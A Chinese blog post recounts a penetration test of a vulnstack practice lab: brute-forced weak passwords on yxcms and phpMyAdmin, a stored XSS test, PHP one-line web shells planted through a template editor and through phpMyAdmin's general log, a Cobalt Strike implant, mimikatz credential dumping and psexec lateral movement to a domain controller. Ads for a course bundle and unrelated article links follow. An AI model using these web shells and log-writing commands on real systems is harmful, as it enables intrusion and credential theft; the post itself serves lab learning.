记一次vulnstack靶场渗透流程

已于 2024-01-17 23:16:10 修改
阅读量894 收藏 17
点赞数 19
文章标签: 网络 学习
于 2023-12-26 17:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZL_1618/article/details/135198551
版权

引文

最近再学内网渗透,准备把涉及内网的基本渗透流程学习学习,正好好友搭建了一个内网靶场,于是我就借着他的平台练习一下,下面来给大家总结一下我渗透的过程。希望能帮助大家。

网站漏洞

渗透的话我们首先一步是进行外网打点,好友只给了我们一个IP,进入之后的页面是这样的:

XRAY漏洞扫描工具扫描网站发现备份源码beifen.rar,我们分析源码找到CMS网站yxcms,开始我们的渗透测试。

http://vps/yxcms/

敏感信息泄露 + 弱口令

在遍历网站信息时,我们发现了后台管理的URL地址

/index.php?r=admin

尝试使用抓包工具BURPSUITE进行密码爆破,成功后得到密码:

admin/123456

PhpMyAdmin弱口令

扫目录发现/phpmyadmin管理系统,我们还是尝试爆破弱口令,得到PHPMYADMIN管理系统密码:

root/root

yxcms功能点 留言本 存在存储型XSS漏洞

在浏览网站结构时,发现留言板页面,通常留言板会存在XSS漏洞,我们尝试一下:

test<script>alert(45)</script>

成功弹窗,说明可以利用,之后可以利用这个漏洞获取管理员cookie等信息。

后台任意文件读写漏洞

前面已知管理员账号密码,于是我们进入后台,发现存在前台模板,我们可以新建模板来传入一句话木马。

<?php eval($_POST[XINO]);?>

因为我们之前下载了源码,代码审计后发现文件保存路径为

yxcms/protected/apps/default/view/default/xino.php

可以连接菜刀蚁剑。

PhpMyAdmin 开启全局日志getshell

参考:phpMyAdmin拿shell的两种方法 - -冰封 - 博客园 (cnblogs.com)

首先判断secure_file_priv是否为空

show variables like '%secure%'

查询日志保存状态

show variables like '%general%'

开启全局日志并修改日志保存位置为C:/phpStudy/WWW/hack.php

set global general_log=on;
set global general_log_file='C:/phpStudy/WWW/hack.php';

执行sql查询语句并在里面包含一句话木马,一句话木马将写入到日志文件hack.php中

Select '<?php eval($_REQUEST[xino]);?>'

蚁剑连接成功。

主机上线cs

靶机为windows系统,因此用cs生成一个windows可执行木马。

使用蚁剑上传并执行

可以在cs上看到主机成功上线,当然不止这一种方式,只是列了其中一种。

后渗透阶段

win7信息收集

使用命令ipconfig发现存在内网网卡

使用命令查看域信息

net config Workstation

接下来探测主机:

net view(需提权至system,执行此命令后所有探测到的主机将在目标列表中显示)

其中OWA为域控,ROOT-XXX为域成员

提权

使用cs内置模块进行提权

成功后将上线一个system权限的会话

获取明文密码

1.通过msf的hashdump等模块

2.使用mimikatz或者cs中的mimikatz模块

这里用cs中自带的

横向移动

有了域管理员账号后,可以使用该域管理员账号密码利用 psexec 登录域内任何一台开启了admin$共享(该共享默认开启) 的主机。

在此之前需要创建一个smb监听器:

成功后域控主机将出现在会话列表,使用同样的方法可以控制域成员。

结语

作为该系列最简单的靶场渗透过程还是比较顺利的,以后会给大家带来其他靶场的渗透流程供大家参考,有兴趣的小伙伴可以自己去试一试,喜欢本文的朋友不妨一键三连。## 最后
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。

因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。

干货主要有:

①1000+CTF历届题库(主流和经典的应该都有了)

②CTF技术文档(最全中文版)

③项目源码(四五十个有趣且经典的练手项目及源码)

④ CTF大赛、web安全、渗透测试方面的视频(适合小白学习)

⑤ 网络安全学习路线图(告别不入流的学习)

⑥ CTF/渗透测试工具镜像文件大全

⑦ 2023密码学/隐身术/PWN技术手册大全

如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

扫码领取

程序员--青青
关注
渗透测试,靶场,模拟搭建渗透测试真实环境,搭建靶场详细流程即相关包.zip
12-05
内容:详细的渗透测试靶场搭建包,以及详细搭建流程,提供了靶场所有环境,比如sql注入,木马,获权等模拟真实环境 适用于:需要学习渗透测试相关知识,但是没有搭建好模拟真实环境的靶场人群下载以及使用,同时针对...
红日内网Vulnstack靶机渗透
m0_63138919的博客
04-19 1274
本文利用红日VulnStack靶场 参考官方手册和部分博主的渗透测试思路,进行一次靶场渗透测试 主要录自我学习的过程 还请各位大神勿喷
渗透学习 webug4.0靶场
07-12
渗透学习 webug4.0靶场 渗透学习 webug4.0靶场 渗透学习 webug4.0靶场
web渗透教程1:pikachu靶场搭建
11-17
带你手把手搭建pikachu靶场环境
WEB渗透学习-XSS-labs靶场
04-20
**XSS(跨站脚本攻击)学习指南:XSS-labs靶场详解** XSS,全称为Cross-Site Scripting,是网络安全领域常见的漏洞类型之一。它允许攻击者通过注入恶意脚本到Web页面中,进而对用户浏览器进行操控。XSS-labs是一个...
php自查无后门靶场源码,渗透测试源码一套
03-22
【PHP自查无后门靶场源码与渗透测试详解】 在网络安全领域,渗透测试是确保网站和应用程序安全性的重要环节。PHP作为广泛应用的服务器端脚本语言,其安全问题备受关注。"php自查无后门靶场源码"是用于安全专业人士...
前端开发攻略---8种方法实现在浏览器中跨页面通信
nibabaoo的博客
10-15 1232
浏览器实现跨标签页通信的多种方式
【JavaEE】——三次握手(详细、易理解)
阿华的博客
10-17 709
宏观设备双方如何建立连接,微观服务器和客户端建立连接“三次握手”过程,解决不同批次连接中“后发先至”的问题,syn(同步)详解
WireShark过滤器
ngczx的博客
10-11 719
Wireshark的过滤器规则可以分为**捕获过滤器**和**显示过滤器**,这两种过滤器有不同的编写规则
Linux系统性能调优技巧详解
运维人生
10-13 607
Linux系统性能调优是一个复杂而持续的过程,需要综合考虑硬件、软件、内核参数、进程管理等多个方面。通过合理的调优措施和持续的监控调整,可以显著提升Linux系统的运行效率和稳定性,为业务提供强有力的支持。性能调优是一个持续的过程,需要不断地监控、分析和调整,以适应不断变化的工作负载和系统环境。希望本文的介绍和代码示例能够帮助您在Linux系统性能调优方面取得更好的效果。
找到占用5601端口的进程ID
m0_46695127的博客
10-13 283
找到占用5601端口的进程ID
【信息安全管理与评估】2023年全国职业院校技能大赛赛题第04套
Play_Sai的博客
10-15 960
取证的信息可能隐藏在正常的、已删除的或受损的文件中,您可能需要运用编码转换技术、加解密技术、隐写技术、数据恢复技术,还需要熟悉常用的文件格式(如办公文档、压缩文档、图片等)。A 集团的 Ubuntu 服务器被黑客入侵,该服务器的 Web 应用系统被上传恶意软件,系统文件被恶意软件破坏,您的团队需要帮助该公司追踪此网络攻击的来源,在服务器上进行全面的检查,包括日志信息、进程信息、系统文件、恶意文件等,从而分析黑客的攻击行为,发现系统中的漏洞,并对发现的漏洞进行修复。这种攻击叫做( )。
三维指纹定位系统(MATLAB,三维空间的定位,四个锚点)
2401_86544394的博客
10-17 535
此三维指纹定位系统采用先进的KNN(K-最近邻)算法,结合四个基站的信号强度(RSSI)数据,能够在复杂的三维空间中精确定位移动终端。适用于智能建筑、仓库管理、医疗设施等多种应用场景。
OSI七层协议
hexadecimal_001的博客
10-14 639
OSI(Open System Interconnection)七层协议,即开放式系统互联参考模型,是一个由国际标准化组织(ISO)提出的用于描述计算机网络中通信的结构和功能的理论模型。它将网络通信过程分为七个层次,每个层次都有特定的功能和协议。
如何识别并防范网络诈骗?
最新发布
10-17 93
你可以通过查看地址栏中的锁定图标来检查网站的安全性。11.报告可疑活动:如果你认为你已经成为诈骗的受害者,或者收到了可疑的通信,立即报告给当地的执法机构或网络犯罪投诉中心。7.更新软件和应用程序:定期更新你的操作系统、浏览器和其他软件,以确保你拥有最新的安全补丁。14.监控银行和信用卡账户:定期检查你的银行和信用卡账户,以便及时发现任何未授权的交易。9.检查网站的隐私政策和用户协议:合法的网站通常会有详细的隐私政策和用户协议。5.使用复杂的密码:为你的在线账户设置复杂且独特的密码,并定期更换它们。
网络安全(黑客技术)2024年三个月自学手册
2401_85026116的博客
10-13 1305
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
H3C Vlan基础配置实验
M建的博客
10-12 336
Vlan基础配置实验
网络编程】掌握Java网络编程:深入理解Socket通信与实战技巧
Dylaniou的博客
10-11 1058
Java的网络Socket编程为开发者提供了强大的工具来构建网络通信应用,从简单的客户端-服务器模型到复杂的分布式系统。Java的网络Socket编程为开发者提供了强大的工具来构建网络通信应用,从简单的客户端-服务器模型到复杂的分布式系统。希望本文能帮助您掌握Java网络编程的核心技术,并在实际项目中灵活运用。如果您有任何疑问或想要分享经验,请在评论区留下您宝贵的意见!🚀🌐🔌。
欧盟通过《网络弹性法案》保障联网产品安全
网络研究观
10-12 271
欧盟理事会通过了《网络弹性法案》(CRA),这是一项新法律,旨在使含有数字组件的消费产品更加安全使用。
红日靶场VulnStack1
10-08
对于红日靶场VulnStack1,我了解到它是一个虚拟机中的漏洞靶场。这个靶场主要用于学习和实践网络安全方面的知识,其中包含了一些常见的漏洞,供用户进行渗透测试和漏洞攻击的实战练习。 由于我是一个AI模型,并没有直接使用和体验过红日靶场VulnStack1,因此无法提供具体的实际体验和操作步骤。但是,我可以帮助回答一些关于网络安全、漏洞攻防等方面的问题。 如果您有关于网络安全、漏洞攻防或者其他相关的问题,请告诉我,我会尽力帮助您解答。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值